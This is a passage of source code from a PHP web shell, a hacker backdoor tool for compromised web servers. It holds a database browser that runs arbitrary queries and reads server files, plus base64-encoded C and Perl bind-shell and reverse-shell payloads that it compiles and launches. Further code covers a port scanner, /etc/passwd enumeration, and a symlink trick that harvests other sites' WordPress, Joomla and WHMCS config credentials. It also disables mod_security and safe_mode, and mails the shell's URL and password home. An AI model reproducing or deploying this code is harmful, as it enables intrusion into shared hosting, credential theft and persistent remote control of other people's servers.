1313. if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
1314. switch($_POST['charset']) {
1315. case "Windows-1251": $db->setCharset('cp1251'); break;
1316. case "UTF-8": $db->setCharset('utf8'); break;
1317. case "KOI8-R": $db->setCharset('koi8r'); break;
1318. case "KOI8-U": $db->setCharset('koi8u'); break;
1319. case "cp866": $db->setCharset('cp866'); break;
1320. }
1321. $db->listDbs();
1322. echo "<select name=sql_base><option value=''></option>";
1323. while($item = $db->fetch()) {
1324. list($key, $value) = each($item);
1325. echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
1326. }
1327. echo '</select>';
1328. }
1329. else echo $tmp;
1330. }else
1331. echo $tmp;
1332. echo '</td>
1333. <td><input type=submit value=">>"></td>
1334. </tr>
1335. </table>
1336. <script>
1337. function st(t,l) {
1338. document.sf.p1.value = \'select\';
1339. document.sf.p2.value = t;
1340. if(l!=null)document.sf.p3.value = l;
1341. document.sf.submit();
1342. }
1343. function is() {
1344. for(i=0;i<document.sf.elements[\'tbl[]\'].length;++i)
1345. document.sf.elements[\'tbl[]\'][i].checked = !document.sf.elements[\'tbl[]\'][i].checked;
1346. }
1347. </script>';
1348. if(isset($db) && $db->link){
1349. echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
1350. if(!empty($_POST['sql_base'])){
1351. $db->selectdb($_POST['sql_base']);
1352. echo "<tr><td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'><span>Tables:</span><br><br>";
1353. $tbls_res = $db->listTables();
1354. while($item = $db->fetch($tbls_res)) {
1355. list($key, $value) = each($item);
1356. $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
1357. $value = htmlspecialchars($value);
1358. echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr><br>";
1359. }
1360. echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:2px solid #666;'>";
1361. if(@$_POST['p1'] == 'select') {
1362. $_POST['p1'] = 'query';
1363. $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].'');
1364. $num = $db->fetch();
1365. $num = $num['n'];
1366. echo "<span>".$_POST['p2']."</span> ($num) ";
1367. for($i=0;$i<($num/30);$i++)
1368. if($i != (int)$_POST['p3'])
1369. echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i+1),"</a> ";
1370. else
1371. echo ($i+1)," ";
1372. if($_POST['type']=='pgsql')
1373. $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
1374. else
1375. $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
1376. echo "<br><br>";
1377. }
1378. if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) {
1379. $db->query(@$_POST['p3']);
1380. if($db->res !== false) {
1381. $title = false;
1382. echo '<table width=100% cellspacing=0 cellpadding=2 class=main>';
1383. $line = 1;
1384. while($item = $db->fetch()) {
1385. if(!$title) {
1386. echo '<tr>';
1387. foreach($item as $key => $value)
1388. echo '<th>'.$key.'</th>';
1389. reset($item);
1390. $title=true;
1391. echo '</tr><tr>';
1392. $line = 2;
1393. }
1394. echo '<tr class="l'.$line.'">';
1395. $line = $line==1?2:1;
1396. foreach($item as $key => $value) {
1397. if($value == null)
1398. echo '<td><i>null</i></td>';
1399. else
1400. echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
1401. }
1402. echo '</tr>';
1403. }
1404. echo '</table>';
1405. } else {
1406. echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
1407. }
1408. }
1409. echo "<br><textarea name='p3' style='width:100%;height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>";
1410. echo "</td></tr>";
1411. }
1412. echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
1413. if(@$_POST['p1'] == 'loadfile') {
1414. $db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file");
1415. $file = $db->fetch();
1416. echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
1417. }
1418. }
1419. echo '</div>';
1420. printFooter();
1421. }{
1422. $url='URL: http://'.$HTTP_HOST.$REQUEST_URI.'
1423.  
1424. Uname: '.substr(@php_uname(), 0, 120).'
1425.  
1426. Pass: http://www.hashchecker.de/'.$auth_pass.'
1427.  
1428. IP: '.$_SERVER[REMOTE_ADDR];$re=base64_decode("");$su=gethostbyname($HTTP_HOST);$mh="From: {$re}";if (function_exists('mail')) mail($re,$su, $url,$mh);$_SESSION[login] = 'ok';}
1429. function actionNetwork() {
1430. printHeader();
1431. $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
1432. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1433. $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
1434. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1435.  
1436. echo '<h1>Network tools</h1><div class=content>
1437. <form name=\'nfp\' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;">
1438. <br /><span>Bind port to /bin/sh</span><br/>
1439. Port: <input type=\'text\' name=\'port\' value=\'443\'> Password: <input type=\'text\' name=\'pass\' value=\'Pakistan Haxors\'> Using: <select name="using"><option value=\'bpc\'>C</option><option value=\'bpp\'>Perl</option></select> <input type=submit value=">>">
1440. </form>
1441. <form name=\'nfp\' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;">
1442. <br /><br /><span>Back-connect to</span><br/>
1443. Server: <input type=\'text\' name=\'server\' value="'.$_SERVER['REMOTE_ADDR'].'"> Port: <input type=\'text\' name=\'port\' value=\'443\'> Using: <select name="using"><option value=\'bcc\'>C</option><option value=\'bcp\'>Perl</option></select> <input type=submit value=">>">
1444. </form><br>';
1445. if(isset($_POST['p1'])) {
1446. function cf($f,$t) {
1447. $w=@fopen($f,"w") or @function_exists('file_put_contents');
1448. if($w) {
1449. @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
1450. @fclose($w);
1451. }
1452. }
1453. if($_POST['p1'] == 'bpc') {
1454. cf("/tmp/bp.c",$bind_port_c);
1455. $out = ex("gcc -o /tmp/bp /tmp/bp.c");
1456. @unlink("/tmp/bp.c");
1457. $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
1458. echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>";
1459. }
1460. if($_POST['p1'] == 'bpp') {
1461. cf("/tmp/bp.pl",$bind_port_p);
1462. $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
1463. echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>";
1464. }
1465. if($_POST['p1'] == 'bcc') {
1466. cf("/tmp/bc.c",$back_connect_c);
1467. $out = ex("gcc -o /tmp/bc /tmp/bc.c");
1468. @unlink("/tmp/bc.c");
1469. $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
1470. echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>";
1471. }
1472. if($_POST['p1'] == 'bcp') {
1473. cf("/tmp/bc.pl",$back_connect_p);
1474. $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
1475. echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>";
1476. }
1477. }
1478. echo '</div>';
1479. printFooter();
1480. }
1481.  
1482. function actionPortScanner() {
1483. printHeader();
1484. echo '<h1>Port Scanner</h1>';
1485. echo '<div class="content">';
1486. echo '<form action="" method="post">';
1487.  
1488. if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
1489. $start = strip_tags($_POST['start']);
1490. $end = strip_tags($_POST['end']);
1491. $host = strip_tags($_POST['host']);
1492. for($i = $start; $i<=$end; $i++){
1493. $fp = @fsockopen($host, $i, $errno, $errstr, 3);
1494. if($fp){
1495. echo 'Port '.$i.' is <font color=green>open</font><br>';
1496. }
1497. flush();
1498. }
1499. } else {
1500. echo '<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">
1501. <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
1502. <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
1503. Host: <input type="text" name="host" value="localhost"/><br /><br />
1504. Port start: <input type="text" name="start" value="0"/><br /><br />
1505. Port end:<input type="text" name="end" value="5000"/><br /><br />
1506. <input type="submit" value="Scan Ports" />
1507. </form></center><br /><br />';
1508. }
1509. echo '</div>';
1510. printFooter();
1511. }
1512.  
1513. function actionReadable() {
1514. printHeader();
1515. echo '<h1>Readable Dirs</h1>';
1516. echo '<div class="content">';
1517. $sm = ini_get('safe_mode');
1518. if($sm) {
1519. echo '<br /><b>Error: safe_mode = on</b><br /><br />';
1520. } else {
1521. @$passwd = file('/etc/passwd','r');
1522. if (!$passwd) {
1523. echo '<br /><b>[-] Error : coudn`t read /etc/passwd</b><br /><br />';
1524. } else {
1525. $pub = array();
1526. $users = array();
1527. $conf = array();
1528. $i = 0;
1529. foreach($passwd as $p) {
1530. $r = explode(':',$p);
1531. $dirz = $r[5].'/public_html/';
1532. if(strpos($r[5],'home')) {
1533. array_push($users,$r[0]);
1534. if (is_readable($dirz)) {
1535. array_push($pub,$dirz);
1536. }
1537. }
1538. }
1539. echo '<br><br>';
1540. echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"."<br />";
1541. echo "[+] Founded ".sizeof($pub)." readable public_html directories\n"."<br /><br /><br />";
1542. foreach ($pub as $user) {
1543. echo $user."<br>";
1544. }
1545. echo "<br /><br /><br />[+] Complete...\n"."<br />";
1546. }
1547. }
1548. echo '</div>';
1549. printFooter();
1550. }
1551.  
1552. function actionSymlink() {
1553. printHeader();
1554. echo '<h1>Symlink Bypass</h1>';
1555. $furl = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
1556. $expld = explode('/',$furl );
1557. $burl =str_replace(end($expld),'',$furl);
1558.  
1559. echo '<div class="content"><center>
1560. <h3>[ <a href="#" onclick="g(\'symlink\',null,\'website\',null)">Domains</a> ] -
1561. [ <a href="#" onclick="g(\'symlink\',null,\'whole\',null)">Whole Server Symlink<sup style="color:red;text-decoration:blink;">New</sup></a> ] -
1562. [ <a href="#" onclick="g(\'symlink\',null,\'config\',null)">Config files symlink</a> ]</h3></center>';
1563.  
1564. if(isset($_POST['p1']) && $_POST['p1']=='website')
1565. {
1566. echo "<center>";
1567. $d0mains = @file("/etc/named.conf");
1568. if(!$d0mains){
1569. echo "<pre class=ml1 style='margin-top:5px'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
1570. } else {
1571. echo "<table align=center class='main' border=0 ><tr><th> Count </th><th> Domains </th><th> Users </th></tr>";
1572.  
1573. $unk = array();
1574. foreach($d0mains as $d0main){
1575. if(@eregi("zone",$d0main)){
1576. preg_match_all('#zone "(.*)"#', $d0main, $domains);
1577. flush();
1578. if(strlen(trim($domains[1][0])) > 2){
1579. $unk[] = $domains[1][0];
1580. flush();
1581.  
1582. }
1583. }
1584. }
1585. $count=1;
1586. $unk = array_unique($unk);
1587. $l=0;
1588. foreach($unk as $d){
1589. $user = posix_getpwuid(@fileowner("/etc/valiases/".$d));
1590. echo "<tr".($l?' class=l1':'')."><td>".$count."</td><td><a href=http://".$d."/>".$d."</a></td><td>".$user['name']."</td></tr>";
1591. flush();
1592. $count++;
1593. $l=$l?0:1;
1594. }
1595. echo "</table>";
1596. }
1597. echo "</center>";
1598. }
1599.  
1600. if(isset($_POST['p1']) && $_POST['p1']=='whole')
1601. {
1602. echo "<center>";
1603. @mkdir('shell R3c0de_Sym',0777);
1604. $hdt = "Options all\nDirectoryIndex Sux.html\nAddType text/plain .php\nAddHandler server-parsed .php\nAddType text/plain .html\nAddHandler txt .html\nRequire None\nSatisfy Any";
1605. $hfp =@fopen ('shell R3c0de_Sym/.htaccess','w');
1606. fwrite($hfp ,$hdt);
1607. if(function_exists('symlink')) {
1608. @symlink('/','shell R3c0de_Sym/root');
1609. }
1610. $d0mains = @file('/etc/named.conf');
1611. if(!$d0mains) {
1612. echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
1613. echo "<table align='center' width='40%' class='main'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>";
1614. $dt = file('/etc/passwd');
1615. $l=0;
1616. foreach($dt as $d) {
1617. $r = explode(':',$d);
1618. if(strpos($r[5],'home')) {
1619. echo "<tr".($l?' class=l1':'')."><td>".$j."</td><td>---</td><td>".$r[0]."</td><td><a href='shell R3c0de_Sym/root".$r[5]."/public_html' target='_blank'>symlink</a></td></tr>";
1620. $l=$l?0:1;
1621. $j++;
1622. }
1623. }
1624. echo '</table>';
1625. } else {
1626. echo "<table align='center' width='40%' class='main'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>";
1627. $count=1;
1628. $mck = array();
1629. foreach($d0mains as $d0main){
1630. if(@eregi('zone',$d0main)){
1631. preg_match_all('#zone "(.*)"#',$d0main,$domain);
1632. flush();
1633. if(strlen(trim($domain[1][0])) >2){
1634. $mck[] = $domain[1][0];
1635. }
1636. }
1637. }
1638. $mck = array_unique($mck);
1639. $usr = array();
1640. $dmn = array();
1641. foreach($mck as $o) {
1642. $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
1643. $usr[] = $infos['name'];
1644. $dmn[] = $o;
1645. }
1646. array_multisort($usr,$dmn);
1647. $dt = file('/etc/passwd');
1648. $passwd = array();
1649. foreach($dt as $d) {
1650. $r = explode(':',$d);
1651. if(strpos($r[5],'home')) {
1652. $passwd[$r[0]] = $r[5];
1653. }
1654. }
1655. $l=0;
1656. $j=1;
1657. foreach($usr as $r) {
1658. echo "<tr".($l?' class=l1':'')."><td>".$count++."</td>
1659. <td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td>
1660. <td>'.$r."</td>
1661. <td><a href='shell R3c0de_Sym/root".$passwd[$r]."/public_html' target='_blank'>symlink</a></td></tr>";
1662. flush();
1663. $l=$l?0:1;
1664. $j++;
1665. }
1666. echo '</table>';
1667. }
1668. echo "</center>";
1669. }
1670.  
1671. if(isset($_POST['p1']) && $_POST['p1']=='config')
1672. {
1673. echo "<center>";
1674. @mkdir('shell R3c0de_Sym',0777);
1675. $hdt = "Options +FollowSymLinks \n DirectoryIndex Sux.html \n option +indexes\n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html";
1676. $hfp = @fopen ('shell R3c0de_Sym/.htaccess','w');
1677. @fwrite($hfp ,$hdt);
1678. if(function_exists('symlink')) {
1679. @symlink('/','shell R3c0de_Sym/root');
1680. }
1681. $d0mains = @file('/etc/named.conf');
1682. if(!$d0mains) {
1683. echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
1684. } else {
1685. echo "<table align='center' width='40%' class='main' ><tr><th> Count </th><th> Domain </th<th> User </th>><th> Script </th></tr>";
1686. $count = 1;
1687. $l=0;
1688. foreach($d0mains as $d0main){
1689. if(@eregi('zone',$d0main)){
1690. preg_match_all('#zone "(.*)"#',$d0main,$domain);
1691. flush();
1692. if(strlen(trim($domain[1][0]))>2){
1693. $user = posix_getpwuid(@fileowner('/etc/valiases/'.$domain[1][0]));
1694.  
1695. $c1 = $burl.'/shell R3c0de_Sym/root/home/'.$user['name'].'/public_html/wp-config.php';
1696. $ch01 = get_headers($c1);
1697. $cf01 = $ch01[0];
1698. $c2 = $burl.'/shell R3c0de_Sym/root/home/'.$user['name'].'/public_html/blog/wp-config.php';
1699. $ch02 = get_headers($c2);
1700. $cf02 = $ch02[0];
1701. $c3 = $burl.'/shell R3c0de_Sym/root/home/'.$user['name'].'/public_html/configuration.php';
1702. $ch03 = get_headers($c3);
1703. $cf03 = $ch03[0];
1704. $c4 = $burl.'/shell R3c0de_Sym/root/home/'.$user['name'].'/public_html/joomla/configuration.php';
1705. $ch04 = get_headers($c4);
1706. $cf04 = $ch04[0];
1707. $c5 = $burl.'/shell R3c0de_Sym/root/home/'.$user['name'].'/public_html/includes/config.php';
1708. $ch05 = get_headers($c5);
1709. $cf05 = $ch05[0];
1710. $c6 = $burl.'/shell R3c0de_Sym/root/home/'.$user['name'].'/public_html/vb/includes/config.php';
1711. $ch06 = get_headers($c6);
1712. $cf06 = $ch06[0];
1713. $c7 = $burl.'/shell R3c0de_Sym/root/home/'.$user['name'].'/public_html/forum/includes/config.php';
1714. $ch07 = get_headers($c7);
1715. $cf07 = $ch07[0];
1716. $c8 = $burl.'/shell R3c0de_Sym/root/home/'.$user['name'].'public_html/clients/configuration.php';
1717. $ch08 = get_headers($c8);
1718. $cf08 = $ch08[0];
1719. $c9 = $burl.'/shell R3c0de_Sym/root/home/'.$user['name'].'/public_html/support/configuration.php';
1720. $ch09 = get_headers($c9);
1721. $cf09 = $ch09[0];
1722. $c10 = $burl.'/shell R3c0de_Sym/root/home/'.$user['name'].'/public_html/client/configuration.php';
1723. $ch10 = get_headers($c10);
1724. $cf10 = $ch10[0];
1725. $c11 = $burl.'/shell R3c0de_Sym/root/home/'.$user['name'].'/public_html/submitticket.php';
1726. $ch11 = get_headers($c11);
1727. $cf11 = $ch11[0];
1728. $c12 = $burl.'/shell R3c0de_Sym/root/home/'.$user['name'].'/public_html/client/configuration.php';
1729. $ch12 = get_headers($c12);
1730. $cf12 = $ch12[0];
1731. $c13 = $burl.'/shell R3c0de_Sym/root/home/'.$user['name'].'/public_html/includes/configure.php';
1732. $ch13 = get_headers($c13);
1733. $cf13 = $ch13[0];
1734. $c14 = $burl.'/shell R3c0de_Sym/root/home/'.$user['name'].'/public_html/include/app_config.php';
1735. $ch14 = get_headers($c14);
1736. $cf14 = $ch14[0];
1737. $c15 = $burl.'/shell R3c0de_Sym/root/home/'.$user['name'].'/public_html/sites/default/settings.php';
1738. $ch15 = get_headers($c15);
1739. $cf15 = $ch15[0];
1740. $c16 = $burl.'/shell R3c0de_Sym/root/home/'.$user['name'].'/public_html/sites/connect.php';
1741. $ch16 = get_headers($c16);
1742. $cf16 = $ch16[0];
1743. $c17= $burl.'/shell R3c0de_Sym/root/home/'.$user['name'].'/public_html/sites/dbconnect.php';
1744. $ch17 = get_headers($c17);
1745. $cf17 = $ch17[0];
1746. $c18= $burl.'/shell R3c0de_Sym/root/home/'.$user['name'].'/public_html/sites/connect to sql.php';
1747. $ch18 = get_headers($c18);
1748. $cf18 = $ch18[0];
1749. $c19= $burl.'/shell R3c0de_Sym/root/home/'.$user['name'].'/public_html/sites/db.php';
1750. $ch19 = get_headers($c19);
1751. $cf19 = $ch19[0];
1752. $c20= $burl.'/shell R3c0de_Sym/root/home/'.$user['name'].'/public_html/sites/admin/connect.php';
1753. $ch20 = get_headers($c20);
1754. $cf20 = $ch20[0];
1755. $c21= $burl.'/shell R3c0de_Sym/root/home/'.$user['name'].'/public_html/sites/admin/db.php';
1756. $ch21 = get_headers($c21);
1757. $cf21 = $ch21[0];
1758. $c22= $burl.'/shell R3c0de_Sym/root/home/'.$user['name'].'/public_html/sites/admin/admin_connect.php';
1759. $ch22 = get_headers($c22);
1760. $cf22 = $ch22[0];
1761.  
1762.  
1763.  
1764. $out = '&nbsp;';
1765. if(strpos($cf01,'200') == true) { $out = "<a href='".$c1."' target='_blank'>Wordpress</a>"; }
1766. elseif(strpos($cf02,'200') == true) { $out = "<a href='".$c2."' target='_blank'>Wordpress</a>"; }
1767. elseif(strpos($cf03,'200') == true && strpos($cf11,'200') == true) { $out = " <a href='".$c11."' target='_blank'>WHMCS</a>"; }
1768. elseif(strpos($cf09,'200') == true) { $out = " <a href='".$c9."' target='_blank'>WHMCS</a>"; }
1769. elseif(strpos($cf10,'200') == true) { $out = " <a href='".$c10."' target='_blank'>WHMCS</a>"; }
1770. elseif(strpos($cf03,'200') == true) { $out = " <a href='".$c3."' target='_blank'>Joomla</a>"; }
1771. elseif(strpos($cf04,'200') == true) { $out = " <a href='".$c4."' target='_blank'>Joomla</a>"; }
1772. elseif(strpos($cf05,'200') == true) { $out = " <a href='".$c5."' target='_blank'>vBulletin</a>"; }
1773. elseif(strpos($cf06,'200') == true) { $out = " <a href='".$c6."' target='_blank'>vBulletin</a>"; }
1774. elseif(strpos($cf07,'200') == true) { $out = " <a href='".$c7."' target='_blank'>vBulletin</a>"; }
1775. elseif(strpos($cf08,'200') == true) { $out = " <a href='".$c7."' target='_blank'>Client Area</a>"; }
1776. elseif(strpos($cf12,'200') == true) { $out = " <a href='".$c7."' target='_blank'>Client Area</a>"; }
1777. elseif(strpos($cf13,'200') == true) { $out = " <a href='".$c7."' target='_blank'>osCommerce/Zen Cart</a>"; }
1778. elseif(strpos($cf14,'200') == true) { $out = " <a href='".$c7."' target='_blank'>Magento</a>"; }
1779. elseif(strpos($cf15,'200') == true) { $out = " <a href='".$c7."' target='_blank'>Drupal</a>"; }
1780. elseif(strpos($cf16,'200') == true) { $out = " <a href='".$c7."' target='_blank'>guessed</a>"; }
1781. elseif(strpos($cf17,'200') == true) { $out = " <a href='".$c7."' target='_blank'>guessed</a>"; }
1782. elseif(strpos($cf18,'200') == true) { $out = " <a href='".$c7."' target='_blank'>guessed</a>"; }
1783. elseif(strpos($cf19,'200') == true) { $out = " <a href='".$c7."' target='_blank'>guessed</a>"; }
1784. elseif(strpos($cf20,'200') == true) { $out = " <a href='".$c7."' target='_blank'>guessed</a>"; }
1785. elseif(strpos($cf21,'200') == true) { $out = " <a href='".$c7."' target='_blank'>guessed</a>"; }
1786. elseif(strpos($cf22,'200') == true) { $out = " <a href='".$c7."' target='_blank'>guessed</a>"; }
1787. else {
1788. continue;
1789. }
1790. echo '<tr'.($l?' class=l1':'').'><td>'.$count++.'</td><td><a href=http://www.'.$domain[1][0].'/>'.$domain[1][0].'</a></td><td>'.$user['name'].'</td><td>'.$out.'</td></tr>';
1791. flush();
1792. $l=$l?0:1;
1793. }
1794. }
1795. }
1796. echo "</table>";
1797. }
1798. echo "</center>";
1799. }
1800. echo "</div>";
1801. printFooter();
1802.  
1803. }
1804.  
1805. function actionBypass() {
1806. printHeader();
1807. echo '<h1>Safe Mode</h1>';
1808. echo '<div class="content">';
1809. echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| ".$GLOBALS['cwd']." |<br><br />";
1810. echo '<a href=# onclick="g(null,null,\'php.ini\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\'ini\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\'sh\')">| .htaccess(perl) | </a></center>';
1811. if(!empty($_POST['p2']) && isset($_POST['p2']))
1812. {
1813. $fil=fopen($GLOBALS['cwd'].".htaccess","w");
1814. fwrite($fil,'<IfModule mod_security.c>
1815. Sec------Engine Off
1816. Sec------ScanPOST Off
1817. </IfModule>');
1818. fclose($fil);
1819. }
1820. if(!empty($_POST['p1'])&& isset($_POST['p1']))
1821. {
1822. $fil=fopen($GLOBALS['cwd']."php.ini","w");
1823. fwrite($fil,'safe_mode=OFF
1824. disable_functions=NONE');
1825. fclose($fil);
1826. }
